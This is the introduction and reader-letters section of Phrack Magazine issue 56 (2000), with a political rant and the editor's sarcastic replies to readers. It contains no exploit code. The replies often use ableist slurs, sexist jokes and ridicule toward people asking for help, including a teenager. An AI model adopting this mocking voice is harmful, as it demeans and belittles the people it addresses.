+---=0x5b 0x72 0x65 0x67 0x69 0x73 0x74 0x65 0x72 0x65 0x64 0x20 0x20 0x68=---+
+---=0x65 0x78 0x20 0x20 0x6f 0x66 0x66 0x65 0x6e 0x64 0x65 0x72 0x7a 0x5b=---+

Volume 0xa Issue 0x38 05.01.2000 0x01[0x10]

|-------------------------- I N T R O D U C T I O N --------------------------|
|-----------------------------------------------------------------------------|
|------------------------- J'envoie la sauce! b00m! -------------------------|

In much of the same SPECTACULAR fashion you've come to expect, here iz your
56th god damned issue of Phrack mutherfuckin' Magazine.  Late?  Nono.  Late
would imply that there exists a publishing schedule of some sort.  We now know
this really isn't the case.  So, in actuality, this issue may in fact be
early.  We have our best people looking into it...

Riotz and protestz and retardz, OH MY!  JESUS CHRIST PEOPLE.  This whole Elian
Gonzalez debacle can just goto hell.  And of course I mean that figuratively
speaking.  I'm not so callous or jaded as to wish harm on an innocent child,
but I speak for a significant majority of people when I say: "Enough is
e-fucking-nough".  Since November of 1999, the U.S. Government has entangled
itself in an embroiled political, social and economic mess that just needs to
END.

Ok, here's the whole story in a nutshell.  Around Thanksgiving of last year,
this fisherman finds a kid floating in an innertube a few miles from Pompano
Beach, FL.  The fisherman does what any God-fearing Samaritan would do: he
pulls the kid out of the water and takes him to the hospital.
So the saga began...

And here's how it should end: Elian should go back to Cuba with his biological
father.  Sure, Cuba sucks, but this is a six-year-old child whose father wants
him to come home.  Since when is it the US Government's job to act as social
services for a sovereign Communist Country family?  Oh, by the way, this has
cost the U.S. Taxpayer more than $580,000 so far.  And it's not over.

Anyhow...  As it happens, apparently Elian has some (distant) relatives in the
US who managed to sneak out of Cuba.  Congratulations.  Good for them.  So
somehow, these people seem to think they have a stake in all this.  Wonderful.
Kids come running for the great taste of fifteen minutes of fame!

Ok.  And what about these relatives?  Well, they're nutz, for one.  Second of
all, they're hardly "close" relativez.  What, that one nutty chick is his
second cousin?  Does that even count?  Great-uncles, and their brothers aside,
a boy's FATHER is his FATHER.  Crikey.  If this was *my* kid, I'd be like:
"Ok, junior, get in the fucking car, we're going home".

Do any of these superfluous people realize what they're doing?  Nevermind the
fact that this little boy is probably going to be scarred in some horribly
repressed fashion, and all the money this is costing...  Wait no..  Actually
that's pretty much the crux of the issue.  Well, my issue with it.  I'm just
sick of it.  Gawd.

And what the hell is up with all the rioters?  Thuggish lowbrows seen on CNN
yelling "FUCK THIS COUNTRY" (after the INS snatch).  Hey guess what retard?
If you don't like, go the fuck back to Cuba.  Like you even know what you're
upset about.  You just wanted an excuse to break shit and burn things (which
they did do).

AND FOR THE LOVE OF GOD, WHAT ABOUT THE FISHERMAN?  WHAT STAKE COULD HE
POSSIBLY STILL HAVE IN ALL THIS?  Keep stretching those 15 minutez there
buddy!  I must say though, the open weeping on national television was very
nice.  "The Sensitive Fisherman".  Rite.  GET BACK OUT THERE AND CATCH ME SOME
DOLPHIN-SAFE TUNA.
Oh, and did I mention that someone named "Jesus Lizarazo" registered
eliangonzalez.com?  Who the crap hell iz that?  Stop the insanity.

Oh, by the by, there'z obviously been an overall format change.  Nothing too
major but I got real bored with the old one.  I think the racing stripez add a
nice touch.  Oh, and I hope you like Hex.  Coz I shure do.

Sorry.  No Phrack World News this time around.  But how many of you guyz
actually read it anyway?  *shrug*

Enjoy.

|-In Fucking Charge Guy ----------------------------------------------- route-|
|-Associate Editor ---------------------------------------------------- kamee-|
|-Vhost Trooper ------------------------------------------------------- felix-|
|-Phrack World Newz -------------------------------------------------- -|
|-ASCII art from 1989 and Caucasian MixMaster Kid --------------------- swern-|
|-F*cking N*tz ------------------------------------------------------- silvio-|
|-Elite --------------------------------------------------------------- nihil-|
|-Unbearably Bearish ------------------------------------------------- NASDAQ-|
|-Microsoft / 2 ----------------------------------------- Two huge monopolies-|
|-Prom Queen ------------------------------------------------------------- dk-|
|-Kisses Like a Girl ------------------------------------------------- shinex-|
|-Special Thankz ---------------------------------------------- sasha, twitch-|
|-Shout Outs ----------------------- incr, frontline, no_ana, alia, miff, udp-|

Phrack Magazine Volume 10 Number 56, May 01, 2000.  ISSN 1068-1035
Contents Copyright (c) 2000 Phrack Magazine.  All Rights Reserved.  Nothing
may be reproduced in whole or in part without written permission from the
editor in chief.  Phrack Magazine is made available to the public, as often as
possible, free of charge.  Go nuts people.  And stop bitching.  You don't pay
for this shit.
|--------------- C O N T A C T   P H R A C K   M A G A Z I N E ---------------|

Editor in Chief:    route@phrack.com
Submissions:        route@phrack.com
Commentary:         loopback@phrack.com
Phrack World News:  disorder@phrack.com

|-----------------------------------------------------------------------------|

Submissions may be encrypted with the following PGP key:

phrack:~# head -20 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of the
 *  editors and contributors, truthful and accurate.  When possible, all facts
 *  are checked, all code is compiled.  However, we are not omniscient (hell,
 *  we don't even get paid).  It is entirely possible something contained
 *  within this publication is incorrect in some way.  If this is the case,
 *  please drop us some email so that we can correct it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
 *  entirely stupid (or illegal) things people may do with the information
 *  contained herein.  Phrack is a compendium of knowledge, wisdom, wit, and
 *  sass.  We neither advocate, condone nor participate in any sort of illicit
 *  behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in the
 *  articles of Phrack Magazine are intellectual property of their authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */

|--------------------- T A B L E   O F   C O N T E N T S ---------------------|

0x01 Introduction                                      Phrack Staff      0x18 K
0x02 Phrack Loopback                                   Phrack Staff      0x64 K
0x03 Phrack Line Noise                                 various           0x6c K
0x04 Phrack Prophile                                   Phrack Staff      0x1c K
0x05 Bypassing StackGuard and StackShield              Bulba and Kil3r   0x36 K
0x06 Project Area52                                    Jitsu-Disk...     0x50 K
0x07 Shared Library Redirection via ELF PLT Infection  Silvio            0x32 K
0x08 Smashing C++ VPTRs                                rix               0x6c K
0x09 Backdooring binary objects                        klog              0x46 K
0x0a Things To Do in Cisco Land When You're Dead       gaius             0x26 K
0x0b A Strict Anomaly Detection Model for IDS          sasha / beetle    0x28 K
0x0c Distributed Tools                                 sasha / lifeline  0x3e K
0x0d Introduction to PAM                               Bryan Ericson     0x20 K
0x0e Exploiting Non-adjacent Memory Spaces             twitch            0x38 K
0x0f Writing MIPS/Irix shellcode                       scut              0x3a K
0x10 Phrack Magazine Extraction Utility                Phrack Staff      0x2a K

Total                                                                   0x3ba K

|-----------------------------------------------------------------------------|

"...IMHO it hasn't improved.  Sure, some technical aspects of the magazine
have improved, but it's mostly a dry technical journal these days.  The
personality that used to characterize Phrack is pretty much non-existant, and
the editorial style has shifted towards one of `I know more about buffer
overflows than you` arrogance.  Take a look at the Phrack Loopback responses
during the first 10 years to the recent ones.  A much higher percentage of
responses are along the lines of `you're an idiot, we at Phrack Staff are much
smarter than you.`..."

    - Trepidity apparently still bitter at not being chosen as Mrs. Phrack
      2000.

|EOF|-------------------------------------------------------------------------|

- P H R A C K   M A G A Z I N E -

Volume 0xa Issue 0x38 05.01.2000 0x02[0x10]

|------------------------------ L O O P B A C K -----------------------------|
|-----------------------------------------------------------------------------|
|-------------------------------- phrack staff -------------------------------|

Phrack Loopback is your chance to write to the Phrack staff with your
comments, questions, or whatever.  The responses are generally written by the
editor, except where noted.  The actual letters are perhaps edited for format,
but generally not for grammar and/or spelling.
We try not to correct the vernacular, as it often adds a colorful -even
colloquial- perspective to the letter in question.

|0x01|------------------------------------------------------------------------|

Hackesses...
by MiStReSS DiVA

My name is MiStReSS DiVA...and I am a hackess...

    [ Who said what now?  A hackess?  Is that some sort of delicious pastry
      treat? ]

"Girls can't hack...," I've heard this more times than not

    [ Hrm.  I usually hear "girls cant do such-and-such az good az guyz" or
      "women shouldn't vote", or the ever popular "YOU WANT ANOTHER BLACK EYE?
      NO?  GOOD!  GET BACK IN THERE AND MAKE ME A PIE." ]

at hackers conventions and the like.  Well, I have some news for everyone;

    [ They're bringing back Perfect Strangers? ]

There are women hackers, and our numbers are rising.

    [ Oh.  Damn.  I really miss Balki. ]

Let's think about it for a moment-Women have always taken second seat to men,
especially in the computer industry and business.

    [ There'z a reason for this...  No..  Hrm.  There really isn't. ]

Over 75% of jobs in computer industries and taken by men.

    [ How do you think we feel?  Over 75% of the jobs in the baking and
      sewing industries are taken by women! ]

So, it's no surprise that there aren't many women in hacking.  There's the
issue of some hacking activities being illegal.

    [ Don't discount the major issue that hacking activities have nothing to
      do with makeup, shopping at strip mallz or gold digging! ]

Many women want to stay as far away from situations like that as possible.  I
know many girls who don't even drink or smoke illegally, no less break into a
UNIX server, let alone know what one is.

    [ I bet these are the same chickz who turn me down when I ask them out.
      Course, all chickz turn me down when I ask them out so I guess it'z a
      moot point. :( ]

Then again, maybe we don't hear about them because there ways are much more
cleaver than that of a man.

    [ Ok, I'm calling a no-way on this sentence here.  As in "no-way are you
      *this* retarded". ]

Women, and I'm applying this to myself as well, are naturally more sneaky and
watchful.

    [ If by sneaky and watchful you mean conniving and vindictive then I
      agree with you. ]

I know for a fact that women have hacked into sites and to systems,

    [ Ah yes.  Thiz bringz me back.  I remember one little minx who hacked
      her way right into my heart.  Did me up real good too, she did. ]

but why do we still get no credit in the underground community?

    [ End this suffrage of innocent hackess' now! ]

Is it because we hid ourselves behind handles

    [ Maybe it iz becuase you have love handlez? ]

and tags,

    [ Nametagz?  Like at Walgreenz? ]

or because people don't want to actually give us the credit.

    [ Well, personally, after reading this, I wouldn't give you a shred of
      credit either. ]

I have only heard of three cases where females were caught in a hack.

    [ Shit.  3?  I can remember the great `chickhack `96` when 423 girlz were
      all caught hacking.  I think their major flaw was that they all tried
      to break into bebe.com at the same time. :( ]

One girl got caught because while sending a file, she sent it to the wrong
location on a server.

    [ What like C:\windows\desktop? ]

One was caught for phreaking, and the other one for obtaining products from
an internet site by gaining root access and shipping them to her home, free of
charge.  These are the only three cases I have found.  And they were all
stupid reasons to get caught.  I know there are many people out there who hack
and don't get caught, but the majority that do get caught, are men.  We don't
do stuff like the chick from hackers, nor do we dress or act in that manner.

    [ Well, I think we've identified your problem.  Angelina Jolie pretty
      much sumz up whut everyone wantz to see in a hackess.  Mmmm.  Delicious
      hackess treats. ]

We go about our lives like most human beings, maybe even a little better.

    [ Or in your case, a little dumber. ]

We don't dress in all black, nor are we interested in only computers.  We are
intelligent and beautiful.
We are the Hackesses.

    [ Mmmmmm.  Hostess Hackesses. ]

Mistress Diva

|0x02|------------------------------------------------------------------------|

Hi, my name is Adam and am regular guy with a home pc who is being hacked and
violated by a military freak..

    [ Military freak like Klinger on M.A.S.H. or military freak like that guy
      in Commando who wore the chain mail shirt? ]

seriously no shit.

    [ Oh.  Ok.  I though you were pulling my leg for second.  Sorry...  Back
      on the clock now. ]

i dont know where to start to ensure my pc security

    [ Well if you didn't have a PC you wouldn't have this problem.  I say get
      rid of it.  The end justifies the means. ]

please reccomend some high level security methods and programs.

    [ Have you tried ignoring it?  That sometimes works for me.  Barring
      that, have you tried dealing with him?  I find that freaks (especially
      military freaks) are usually pretty cordial when you deal with them on
      their terms.  I say give in to his demands. ]

if you cant do that then please reccommend any links i have found your site
usefull because you provide elite items therefore i require your help please.

    [ The highest level of security I can think of is God.  I recommend you
      pray each night, and I'll forward this to him.  Together we *can* make
      a difference. ]

Adam Smith

|0x03|------------------------------------------------------------------------|

Page 2 is hilarious ... P55-02 ... scrap the rest and just keep publishing
that page.  For issue #56 just republish one of the way older editions, it
seems they are FINDING THOSE ONES!!@!@. :)

    [ HAHAHAHAHHAHAHAHA.  Wait.  I don't get it. ]

P.S. I don't have a computer either, I'm sending this via DSS and I'm typing
on the Remote Control.

    [ What do you mean, `either`?  Wait, is this Adam from above?  Hey man,
      did you do what I recommended?  Did it work?  The forward to God
      bounced so I wasn't sure if anything happened.  Good for you man! ]

Anonymous

|0x04|------------------------------------------------------------------------|

Hi,

Let me explain what I need for the job I do.  I have what we call mystery
diners which visit my restaurant each month, this is done by a firm called
MARITZ in Berkshire, what I would like is the dates when they visit my
restaurant so I can make myself available for the visit day, is this possible
in any way.

    [ If you knew then there wouldn't be any more mystery to it, now would
      there?  What fun is that? ]

Gary

|0x05|------------------------------------------------------------------------|

Does the author of article 52-9 have a degree in literature?

    [ Definitely not.  However, I think he has a degree in money management.
      Well, maybe not.  But he's SO very good with money.  Maybe he just
      likes it alot.  Maybe it's something ingrained into his personality or
      culture... ]

If so, I think we made some sashimi together.

    [ Maybe it was bagels? ]

HeftyNuts

    [ Hrm.  Do you get around ok?  Do you have a little wheelbarrow you put
      them in? ]

|0x06|------------------------------------------------------------------------|

Hey Route,

Just wanted to compliment you on Phrack 55.  It's very well done, excellent
articles, very clean and professional, and the Loopback is hilarious, as
always.  Exactly what it should be, and a lot more.  Well done, keep up the
good work and spreading the info.  Thank you for spending your time to bring
this to us.

    [ SEE!?  Some people actually DO like me! ]

EchoMirage

|0x07|------------------------------------------------------------------------|

I came to this page to see what kind of fucked up, twisted, LOSERS would run
something like this!

    [ Just your average run-of-the-mill sexier-than-cheescake losers.  The
      kind with luscious filling. ]

Phracked!  Phracked!?!  Boy, was I an ass.

    [ Was? ]

The editors comments are the funniest damn thing on the net right now.

    [ I'm slicker this year. ]

No kiddin'.
It's hilarious the number of people who think he's Percy -fuckn'- Ross

    [ Yah.  The current count is at 384572. ]

some sorta hacker dogooder out there to free humanity (or save little boys
knee deep in there own shit).  You guys are hilarious.  I'll be back to read
some more, please, keep up the good work.

A New Fan

    [ 384573. ]

|0x08|------------------------------------------------------------------------|

Hi -

My name is Dawn, I think your commentary on other people's articles are
absolutely hilarious and if you're not doing anything on Friday, I'd like
to...

    [ HOLY FUCK YOU'D LIKE TO WHAT?!@#!# ]

just kidding!!

    [ SWEET FUCKING CHRIST GIRL!  DON'T EVER DO THAT TO ME.  DO YOU KNOW WHERE
      I'M COMING FROM?  (A COLD LONELY PLACE WITH NO GIRLZ). ]

Anyways!  I just wanted to tell you how funny I think you are and I will now
become an avid reader of Phrack because of your comic sarcasm!

    [ How about you become an avid reader due to my irresistable charm and
      unending appeal!  *wink* *wink* *puppy dog face* ]

;P

love, Dawn

    [ Love??@?#!?@#?  OMGOMGOMGOMGOMGOMG!  I'm getting butterfliez in my
      tummy! ]

Talk to you later I hope!

    [ Dawn, do you by *any* chance happen to like food or sleeping or
      procreation?  If so, I think we may have some thingz in common and we
      definitely need to get together as soon as possible.  Please write me
      back as soon as possible, only if you're hot though. ]

|0x09|------------------------------------------------------------------------|

Helu,

First off, much thanks to the Phrack staff for producing a wonderful
publication.. regardless of _WHEN_ they come out.  I have found them very
informative since the current group tookover the whole process.

    [ Group?  Paha.  I wish I had a staff.  It'z just me and my mom dude.
      She doez the writing and I do the copy and editz. ]

I read the article on "Building Bastion Routers Using Cisco IOS",

    [ (p55-10). ]

which was a decent piece and contained a lot of basic IOS information that
would apply to building a bastion router.
There was a part of a section however that I felt should've been covered a
little more accurately,

    [ WELL PREACH ON BROTHER!@ ]

which was in the section entitled "Step 2 : Limit remote access".  The article
mentions that there have been rumors that SSH would make it into Cisco IOS
12.0, however it never made it in.  Now, I'm not certain when the actual
article was written so it may just be that the article has old information.
Nonetheless, there is SSH support included in Cisco IOS 12.05(S) and it works
like a charm.

A few things worth noting about Cisco IOS 12.05(S):

-- It is the preferred and recommended IOS release for Internet backbone
   routers as well as for service providers ( i.e. perfect candidates for
   bastion routers ).

-- It runs on enterprise class routers.  Meaning the image runs on the
   following hardware: 7200, 7500, and 12000 (GSR) series routers.

-- It was released in July of 1999.

So there are a lot of people that aren't running their operation on
enterprise class routers, however a ton of NSPs and ISPs do; thus this
information about SSH is worthy of mentioning.

Anyways, keep up the excellent work.

    [ Thankz for your input! ]

Craig

|0x0a|------------------------------------------------------------------------|

Gentlemen,

I enjoy reading your issues when you get them out and all I have to say is
keep up the good work.

ArgentRisk

    [ See, I just like to pepper a few of these babies in here so you people
      know that there are a precious few who like me and my mom. ]

|0x0b|------------------------------------------------------------------------|

Dear Sultan of Love, et al.,

    [ Huh. ]

I wanted to give some of your readers help on some of the stuff they sent in.
One, get serious help.

    [ Ok thankz! ]

Two, check out the book "PIHKAL: Phenylalanines I Have Known and Loved."  I
can't remember who it's by, but it's got everything you ever wanted to know
about psychotropics, psychodelics, and more... much, much more.  Read and
practice at your discretion.

    [ You suck.  You recommend a book _you_ can't remember with some
      goofy-ass title _I_ can't remember? ]

Three, I lived in Japan and had peanut butter sent to me, because peanut
butter made in Japan is awful.

    [ It didn't use to be.  Back in the 1920's and 1930's Japanese peanut
      butter was considered to be the best in world.  Mercenary ronin were
      often paid off with jars of the stuff.  This all changed after WWII.
      Recently declassified State Department documents bring light to the
      fact that several key strategic targets during WWII bombing raids were
      the Japanese peanut butter factories.  The documents list the reason
      for the strategic importance as "creamy goodness".  Pundits charge
      however that the U.S. just couldn't live with Japan having the peanut
      butter edge.  Either way, we bombed the Japanese peanut industry back
      into the stone age. ]

The guy who talked about smuggling drugs into Japan in peanut butter has
really fubar'd.  Some poor shmuck in Japanese customs is going to be opening
up my decent edible peanut butter.  For godsakes, guys, necessity may be the
mother of invention, but sometimes it's just a mother.

    [ LEAVE MY MOM OUT OF THIS, JERKOFF! ]

Leave well enough alone.

    [ Now why on earth should our drug-loving friends in Japan be held
      hostage by your desire to eat 'Jiffy' instead 'Mister Super Happy Fun
      Peanut Butter Joy'? ]

Lastly, I actually don't have a thing to say about computers.  I'm a med
student and know next to nothing about computers.  I just wanted to let you
know that you guys are so funny you put me in tears.  Do you really have a
hard time meeting chicks?!

    [ Not meeting them, no.  Just talking to them.  I tend to drool. ]

I don't believe it.

    [ Are you coming on to me? ]

Uma

    [ Goddess? ]

|0x0c|------------------------------------------------------------------------|

Hi!

I wondered if you could help me to crack userpasswords from PWL-files.

    [ Do you often submit passing musings to Underground Journalz? ]

I'm having a project about computer security at school and it would be nice
to have this as an example.

    [ I'm having a hard time caring. ]

Tom Erik Gundersen

|0x0d|------------------------------------------------------------------------|

    [ (p55-17). ]

Someone please tell our friend here that Cisco has already implemented
dynamic access control for the H.323 protocol starting with version 12.0 of
the IOS software (in the firewall extension -12.0fw-).

    [ Done! ]

Anonymous

|0x0e|------------------------------------------------------------------------|

I've just finished studying a copy of the K&R/ANSI C tutorial I found in my
library, and I'm very interested in moving onto writing C programs that use
the serial or parallel ports.

    [ Excellent reference book. ]

I'm trying to create my own simple electronic devices to connect to my
computer, but I am having locating a good resource or tutorial that discusses
serial/parallel port programming.  Could you give me a good site please?

    [ http://www.eng.auburn.edu/users/doug/serial.html and
      http://www.syclus.com/cscene/CS4/CS4-01.html are decent. ]

BTW, the mag is great.  Keep up the good work :)

    [ Thankz.  Good luck with your programming! ]

Anonymous

|0x0f|------------------------------------------------------------------------|

Hey, i was browsing through the web and i came to your page, i was just
wondering what Phrack Magazine actually was about, the articles seemed really
intereting and i want to get a subscription.  The web site didn't explain a
lot for me, i'm sorry for bothering you, thanks a lot.

    [ Do you get tired putting your socks on?  Do you get lost on your way to
      the kitchen?  You may be retarded.  Check with your family doctor. ]

Anonymous

|0x10|------------------------------------------------------------------------|

My name is route and I'm so elite that I have to make love to my hand three
times a day.

    [ YA-HA.  I wish!  Three times a day in some fantasy world maybe!  No,
      I'm pretty much a one timer, then it'z rite off to sleep! ]

I can't get rid of all the spots on my silly geeky face

    [ They told me the radiation burns would go away after a few months. :( ]

and I'm still a virgin.

    [ Hah!  Apparently SOMEONE hasn't been checking the #hack sexchart:
      http://www.escape.com/~max-q/sexchart.shtml)! ]

Why are all hackers such fucking losers?

    [ Why are there so many, songs about rainbows? ]

All the articles in phrack could have been written by a 12 year old.

    [ Man.  That would have to one 12 year old with ALOT of free time. ]

Do any of you faggots even have any computing qualifications?

    [ I'll have you know, mister smartguy, that I got a degree from Devry! ]

And have any of you ever even kissed a girl?

    [ Well, I've seen picturez of girlz being kissed, doez that count? ]

Dr Robert Gray

    [ I'm almost positive the good doctor wanted people to email him there
      with commentz to his letter. ]

|0x11|------------------------------------------------------------------------|

Hello,

I just wanted to write to tell you that I recently read the "Phrack Loopback"
in Phrack55.  I enjoyed the last letter about the McDonalds article so I
decided to read it.  I worked at Mc Donalds for a couple years back in High
School, and let me tell you that this article had me laughing so hard I was
crying.  Keep up the good work.

Ryan

    [ Crying because you worked at Mc Donalds for a couple yearz or crying
      because you've only moved up to Wendy'z? ]

|0x12|------------------------------------------------------------------------|

Hi,

I know you have better things to do.

    [ Nope!  Not really! ]

But I didnt know who to turn to.

    [ Did you try the A-team?  I hear that if you have a problem, if no one
      else can help you and if you can find them, maybe you can hire: the
      A-team. ]

I had my tax documents and other stuff protected with encypted magic folders.

    [ Hrm.  Are we talking David Copperfield kinda magic or Merlin kinda
      magic? ]

I got the whole thing copied to a CD.
The only thing i did wrong was that I didnt decrypt it.  After that I was
having problems with my software so I formatted my hard drive.

    [ Geeze.  Way to go moron. ]

Now the problem is that I have lost my recovery floppy.

    [ Hhahahaha!  Holy shit that sucks! ]

I dont know how to access the files.  I have them on the CD but they are all
encrypted and stuff.  What should I do.  I really do need your help.  Please
do reply,

Ali Tariq

p.s. If you want me to send a file (encryted one) I will send it so that you
can test different utilities on it.

    [ Of course!  Want me to do your taxez if I crack the file too? ]

|0x13|------------------------------------------------------------------------|

My brother has spent the last week reading Phrack.  He's a total fucking
idiot (doesn't run in the family, maybe he's adopted... I can only hope for so
much) and now he thinks he's a hacker.  He goes into chat rooms and threatens
to send people viruses when he can't even tie his own fucking shoe laces!

    [ Yeah, but with the advent of velcro who needs to tie their own shoes? ]

Shame on you for letting total fucking retards read Phrack!

    [ We let you read Phrack. ]

Linux Bitch

    [ Well, "Linux Bitch", Phrack is an equal opportunity magazine.  We don't
      ostricize the retarded simply because they may drool ocassionally or
      maybe sit in their own filth.  Nay.  We encourage people of all levelz
      of retardation to bask in the wealth of knowledge that each little
      character brings.  We believe that knowledge is meant to be free, and
      sometimes knowledge seeks out the path of least resistance, and
      sometimes it takez more difficult route.  Ok, and sometimez knowledge
      just quitz half-way there and goez drinking with hiz buddiez.  I
      totally forgot my point.

|0x14|------------------------------------------------------------------------|

Hey

What is u? r comments about scientists who's creating machines thinking like
humans, as well as looking as humans - so called humanoids?  Does it scares u
or do u not care?
I'm searching for people who can fight Artificial Intelligence back.  People
with H/C/P skills as well as explosives.  Please mail me ASAP, it's urgent.
It's our future.

Q Wakee

    [ Mister Wakee, this is a problem that I have seen coming since Atari'z
      Pong first entered, nay --invaded-- our homez.  I've been waiting for a
      man of action to step forward for a long, long time.  In fact, since
      1990, I've been running my own underground resistance (it'z called HAHA
      (Humanz against hostile androidz)).  Until now, I thought I was the
      only one (my resistance has a membership of 1 (one)).  We should
      definitely team up and fight this disgusting menace together.  I'll
      bring the doughnutz and lotion, you bring the robot stopping gunz.  Do
      you have any brochurez?  I've been working on one entitled "So You Want
      to Stop Humanoid Robotz".  It'z pretty much industry standard
      boilerplate stuff, with pop-ups of me shooting robots and some
      scratch-and-sniff conspiracy theories.  Please let me know when we can
      have our first meeting, oh we'll have to use your compound because my
      mom doesn't let me have people over anymore. ]

|0x15|------------------------------------------------------------------------|

im confused, what do u guys actually do at phrack?

    [ Phrack is a puppet company setup by the CIA to covertly gather
      intelligence on the tragically retarded.  It's been a goldmine! ]

Anonymous

|0x16|------------------------------------------------------------------------|

1) Phrack's cool

    [ Like Norway! ]

2) Im makin a page on x-plosives etc.  Ive noticed a few of your ish's
contain xtracts from the Poor Man's James Bond.  If whoever of you haz it
could advise me as to were I could get a phile of this, or send me one,

    [ http://www.darwinawards.com/legends/legends1999-10.html ]

or publish more ish's with anarchy stuff, it'd be k-appreciated.

    [ You're a k-idiot. ]

Anonymous

|0x17|------------------------------------------------------------------------|

Glad to have you back and many thanks.
[ Well I'm glad to have YOU back mister toughguy! ] Always enjoy the articles. Nice job frying the fools too. About had me out of my chair. Pardon the lame e-mail addy, but visiting the folks right now. [ Yah, how iz mom'z sexual-addiction treatment coming along? ] Symbolic constant, very good, wish I'd thought of it. [ Paha! BUT YOU DIDN'T, DID YOU? I DID! PROPZ TO ME! ] Guess I'll have to renew the Phrack link on my page. [ SAINTZ BE PRASIED! ] Put ya next to Fyodor. [ Gee, nestled between one-hit wonder Fyodor and probably antionline, wonerful. I'll listen to you now and kill myself later. ] Hasta, Spiny_Norman [ Like Norman Fell, t.v.'z Mister Roper from Three'z Company? (A poor man'z Don Knottz if you ask me.) ] |0x18|------------------------------------------------------------------------| In my English class for school we were asked to write a persuasive essay about anything we wanted. At first I was going to do mine on 'Are their really extraterrestrials?' [ HOLY SHIT THAT'Z AWESOME! ] But I decided that was stupid [ Oh wait, you're right. Idiot. ] and found I know more about hacking then anything. [ Uh huh. ] The only problem is, I have no clue what question to answer. Got any ideas??? Anonymous [ How about `Why I'm a Retard by Anonymous Dork` or `Why I Know More About Hacking Than Anything (subtitle: and I really don't know anything about anything` or `Darwin Was Wrong: An Essay On Me`. ] |0x19|------------------------------------------------------------------------| how do i get other people's IP addres?? do u know? [ Oh yes. OH YES. I know. Absolutely I do. I know this little arcane tidbit. No way am I telling you though. NOooooooo Way. I can't just be giving away all the secretz can I? 
] Anonymous |0x1a|------------------------------------------------------------------------| Greetings, just in case the folks who write to you asking for manuals for Darwin Award Delivery Devices are not sufficiently intimidated by your usual "you will die, I hope you understand" response, I thought I'd pass this info along: at least Massachusetts, though probably many other states as well, has what it calls an Infernal Device law. This law defines an "infernal device" loosely to cover things that will get idiots killed in their parents' basement, and then bans it. So it's not just the Grim Reaper who awaits people who try to put lighter fluid in their supersoakers, but also The Man. #include UnhandledVagrant22 [ Hrm, how are the other 21 unhandledVagrantz doing anyway? Any of you found work yet? You know, the life of a hobo, while seeming glamorous and sexy, isn't all the brochurez make it to be. Come home. Your mother and I miss you terribly. ] |0x1b|------------------------------------------------------------------------| I am really sorry to bother you with this question but I am desperate. [ I'm desperate too, but prolly a different kind of desperate. ] I know that there is a folder on the PC that stores all the mail you have ever written. Even mail that you have deleted. As you can see I am on AOsmelL. I wrote some mail at work and on Monday morning, if not sooner... my boss is going to see it. Where is that file? I have to get to it so I can get the mail out of there. [ If you're going to have an affair with your boss's wife at least be smart enough to NOT write her love letters on HIS computer. Haha. Dummy. You're gonna be unemployed. ] Thank you in advance for any help you can give me. [ Move to a new town and start over. ] Anonymous |0x1c|------------------------------------------------------------------------| [ (p55-04). ] > There is also another reason why W. Richard Stevens is > featured here -- he was to be the prophile for Phrack 55. 
This is just all so incredibly sad. What a loss. Thank you for P55. [ Agreed. Thankz for your support and condolences. ] Yours, Josh Birnbaum (noOrg). |0x1d|------------------------------------------------------------------------| i think you should know that a well known hacker by the name of "the jolly rodger" (the one with the cook book), is extracting philes from the archives and putting them in his cook book with out giving the nessecery credit to the writers. [ Does he include recipes for crayon sandwiches? Coz that'z renz's personal recipe and he should definitely give due credit. ] he may say that the philes were writen by him,but the fact that they are written word for word, points to him as the cuprit. HACK SAW [ JIM DUGGAN? HEEEEYOH! ] |0x1e|------------------------------------------------------------------------| I AM IGOR. I AM BRASIL. I NOW UNDERSTEND VERY WELL OF INGLAS,. I NEED OF THE DRIVER FOR HAKCKERS, FOR ME INVASION THE COMPUTERS FROM THE PEOPLES. YOU UNDERSTEND?? [ I AM DISRESPECTFUL TO DIRT. CAN YOU SEE THAT I AM SERIOUS? ] OBS:CORCEL OF TROIA. IGOR [ OUT OF MY WAY, ALL OF YOU. THIS IS NO PLACE FOR LOAFERS! JOIN ME OR DIE! CAN YOU DO ANY LESS? ] |0x1f|------------------------------------------------------------------------| My name is Thomas and am currently still in what you would call in America as senior high. I'm 15 years old and found this Phrack page while i was surfing on the net. [ Well I see you've done your homework. Nice work Thomas! ] I've always wanted to become involved in the art of hacking and i really don't know how to really start i've had my computer for about 2 and some years and catch on to things preety well and was wondering where to go from here. [ Let'z plug that into the career calculator and see what she comes up with..... Ok.. Yes.. Let'z see here... 
- 30.98% Help desk for regional fast food new hire processing office - 30.56% Junior copier repair engineer - 15.40% NO CAREER FOUND - 12.45% Phone support engineer for the outdoor furniture industry - 10.61% "Associate" Hrm. Lookz bleak. ] All i wanted to ask you if you can help me out by telling me how i can start out,i don't intend to reach a master level even though it is an aspiration of mine. [ Whoa Tommy. Rome wasn't built in a day, and neither are superhackers. Start small, keep at it, and take your vitamins and say your prayers like a good little Hulkamaniac. ] I'm currently using my brothers computer because it's a shit load faster than mine and would appreciate it if you could write back and maybe give me some good insight on how i can start out which probably would involve a lot of reading and learning more about programing. [ My first bit of advice is for you to *definitely* steal your brother's computer. Survival of the fittest my boy! And besides, one of the many traits of a superhacker is how fast he can run crackerjack on passwd files (and yes this implies you should be running DOS -- Unix is a fad). My second bit of advice is to read as much as possible. Anything By the late W. Richard Stevens. Check out http://www.securityfocus.com. Keep up to date with current eventz in the security world. Try and make friends in the scene. My third bit of advice is to give up at the first sign of adversity or difficulty. Life rewards cowards, Thomas. Never forget that (persistence pays off in the long run but laziness pays off right away). ] PS:thankyou for taking the time out to read my message [ The pleasure was all mine, Son. ] Thomas |0x20|------------------------------------------------------------------------| my ingles Sux.... [ It'z ok, so doez my Spanish. ] it will be that you source of the accountant of its page could me seder codi? 
